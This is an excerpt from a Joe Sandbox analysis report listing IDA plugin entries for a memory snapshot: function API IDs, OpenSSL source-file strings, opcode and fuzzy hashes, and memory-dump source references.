                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_strdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 2148955802-4238427508
                                                                                                                                                                                                                                          • Opcode ID: 4fcc587332fcd85da71337ecb7517b00310b11705aad0983c4cd1313d0b66de5
                                                                                                                                                                                                                                          • Instruction ID: ab164450e502d1d709c4bd1092e320a3fd7759cf97befeeb64c1738d6698ed5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fcc587332fcd85da71337ecb7517b00310b11705aad0983c4cd1313d0b66de5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7411BFA5B0DE5685FF619F45E8507B86751BB81BE4F040235DA8D0BB84CE6DF642CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_memdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 3962629258-4238427508
                                                                                                                                                                                                                                          • Opcode ID: 3108a5092fda8c8bee01f408271f6aa1c4df9363ff0874777839b1e8f9030971
                                                                                                                                                                                                                                          • Instruction ID: 0bd71c5d539a0ae8ce81b3a41c2116e448d1096f6b220231fd85ed51c30fa279
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3108a5092fda8c8bee01f408271f6aa1c4df9363ff0874777839b1e8f9030971
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38011E31B19F8291EE999B15E4407E9A294FF48BD0F484131EF5D47B45DF2CE6628700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_memdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 3962629258-2868363209
                                                                                                                                                                                                                                          • Opcode ID: 2dc206ac1897eba174e4d68926f44c31a7b3390a93b44d875a904ad68d885eb1
                                                                                                                                                                                                                                          • Instruction ID: 52e6366b2a9922fae221d70d51860987bfa88e86b042fd0650efd5d684239124
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dc206ac1897eba174e4d68926f44c31a7b3390a93b44d875a904ad68d885eb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53016D35B09F8180EA919B16E8442A8A390FF44FE4F084231EE5D5BB99EF3CE5928704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_cust.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-3973221358
                                                                                                                                                                                                                                          • Opcode ID: 3cf5db9897d16314f6c406a7537cbdf5f713d31316b71214a26921031eca8072
                                                                                                                                                                                                                                          • Instruction ID: eb5d69746c715fc94bdba84048781833812b487206aa8e3bd5a1fc41f272cc58
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cf5db9897d16314f6c406a7537cbdf5f713d31316b71214a26921031eca8072
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18018031B19E0281EB10DB15E4405A9A761FF84BE4F088236EE8D47799DF7CF150C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_memdup
                                                                                                                                                                                                                                          • String ID: D:\a\1\s\ssl\packet_local.h
                                                                                                                                                                                                                                          • API String ID: 3962629258-373350680
                                                                                                                                                                                                                                          • Opcode ID: 6eceafe0f9ac89be950eaf40397fa8a42b0b463cabdcf8e0bbc67e2867511beb
                                                                                                                                                                                                                                          • Instruction ID: 82208a05d35702b9b0cbf74fc36db078b80ffcacae92cdcf1eeab611d0fb362b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eceafe0f9ac89be950eaf40397fa8a42b0b463cabdcf8e0bbc67e2867511beb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201E132B06F4181EB518F15E84065977A4FB58BD0F089531EE9C97B59DF3CE5918700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_zallocR_put_error
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\packet.c
                                                                                                                                                                                                                                          • API String ID: 2718799170-1434567093
                                                                                                                                                                                                                                          • Opcode ID: 59326ab27369182db2ce9892aaeb255d9a41e7f068212e692eec0036cf6bba17
                                                                                                                                                                                                                                          • Instruction ID: d1cbf71adeb4474295f103e72efea09252ada92f9d974a6b526fc9d102ab2e02
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59326ab27369182db2ce9892aaeb255d9a41e7f068212e692eec0036cf6bba17
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9014F72A06F0586EF14CB24E4557A873E0FB54BA8F600134DA0C47391EF3DEA9AC750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_freeO_strdup
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_sess.c
                                                                                                                                                                                                                                          • API String ID: 2148955802-2868363209
                                                                                                                                                                                                                                          • Opcode ID: dc3d2fc0f14784eb2e146324ee3a97f3f81b5d0262eaa536f718f385f35f1364
                                                                                                                                                                                                                                          • Instruction ID: 52b1faaab2491408bdab36fc240f67af3c60e481a951e7a4fc48d47fbad3cb6b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc3d2fc0f14784eb2e146324ee3a97f3f81b5d0262eaa536f718f385f35f1364
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F0A921B08E4151FF95CB15E9446A9A395FF48BE0F188231ED4C47756EE2CE6914700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\rec_layer_d1.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-1306860146
                                                                                                                                                                                                                                          • Opcode ID: 5169c80baa392f2f343d14022db2a2c0489a76904eba205426d6dfcd2018c174
                                                                                                                                                                                                                                          • Instruction ID: e3794637de9d5923124c7743f873a3845f70781c9fe68627b8772f18be28f893
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5169c80baa392f2f343d14022db2a2c0489a76904eba205426d6dfcd2018c174
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11513C22A08E4281EE909F6594506B963F0FF94BE4F585232EE4D87B85DF6DF4918310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E0893F5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E08940B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E089455
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E08946B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E0894B5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E081933: CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E0894CB
                                                                                                                                                                                                                                          • CRYPTO_free.LIBCRYPTO-1_1 ref: 00007FF81E086502
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\d1_lib.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-490761327
                                                                                                                                                                                                                                          • Opcode ID: 6eeef9d067edb065871d973f6c08593b58f014f562573e8d68bcd38784440223
                                                                                                                                                                                                                                          • Instruction ID: bd2ab00df2025ae48834256aac65a20c7bdde31e344b6ff2130541a9b13c33ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eeef9d067edb065871d973f6c08593b58f014f562573e8d68bcd38784440223
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F0FF21E08A8240EF14AB61D8557FD2791FF84BE8F081231ED4E4A397CF2CB5518351
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\ssl3_record.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-2721125279
                                                                                                                                                                                                                                          • Opcode ID: 309ac8ddcce84b15061a267a37eda474b70396621fe7370d901befdeee5a4623
                                                                                                                                                                                                                                          • Instruction ID: aa29c949e7e0d3f4956354478370d6718c0503d485c7c7eff742b3f005e208ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 309ac8ddcce84b15061a267a37eda474b70396621fe7370d901befdeee5a4623
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8F0B432F28E5180EF505B14E880668A3A4FF48BE4F585131FE8D53749DE38E551C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_clear_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_enc.c
                                                                                                                                                                                                                                          • API String ID: 2011826501-1839494539
                                                                                                                                                                                                                                          • Opcode ID: bf896ffc5c5d8f6b1193d4e72359478347af65c5f19c531c57b647d77ab3b874
                                                                                                                                                                                                                                          • Instruction ID: 32fb9040c1153926a0f1d0f5091675b21e292d56897a2a72ba624212a00eba01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf896ffc5c5d8f6b1193d4e72359478347af65c5f19c531c57b647d77ab3b874
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F0ED72B09B8194DF849B65D4897E833A0FB49FA4F584232EE4D8B361CF29E197C315
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_free
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\s3_lib.c
                                                                                                                                                                                                                                          • API String ID: 2581946324-4238427508
                                                                                                                                                                                                                                          • Opcode ID: 6dd7d71263fe0d195323df282845c5af553974c56a1c9e52e62c151ae13b08e9
                                                                                                                                                                                                                                          • Instruction ID: ff348a53255b65a48d5c2f653e148ff1dc63cc7c37789d395bd1f3f140c2860b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dd7d71263fe0d195323df282845c5af553974c56a1c9e52e62c151ae13b08e9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E0E666708E51C5EB019F25F4406986356F7C0BA8F090132DE4C17795DE7AE4A6C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_read_lockD_unlock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 102331797-0
